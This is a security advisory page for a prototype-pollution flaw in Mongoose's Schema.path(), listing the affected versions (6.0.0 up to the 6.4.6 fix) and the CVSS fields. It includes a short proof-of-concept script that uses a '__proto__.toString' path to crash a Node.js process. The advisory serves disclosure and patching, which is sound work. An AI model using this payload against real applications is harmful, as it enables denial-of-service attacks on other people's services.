GHSA-h8hf-x3f4-xwgp

    Dashboard / Vulnerabilities / GHSA-h8hf-x3f4-xwgp

    GHSA-h8hf-x3f4-xwgp

    Published: 27 Aug 2022Last Modified: 22 Apr 2024

    Summary: Mongoose Vulnerable to Prototype Pollution in Schema Object

    Details: ### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment. Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack. ### Proof of Concept ```js // poc.js const mongoose = require('mongoose'); const schema = new mongoose.Schema(); malicious_payload = '__proto__.toString' schema.path(malicious_payload, [String]) x = {} console.log(x.toString()) // crashed (Denial of service (DoS) attack) ``` ### Impact This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.

    Affected packages

    Package

    Name: mongoose

    Purl: pkg:npm/mongoose

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 6.0.0
    Fixed -6.4.6

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-h8hf-x3f4-xwgp | CVE-DB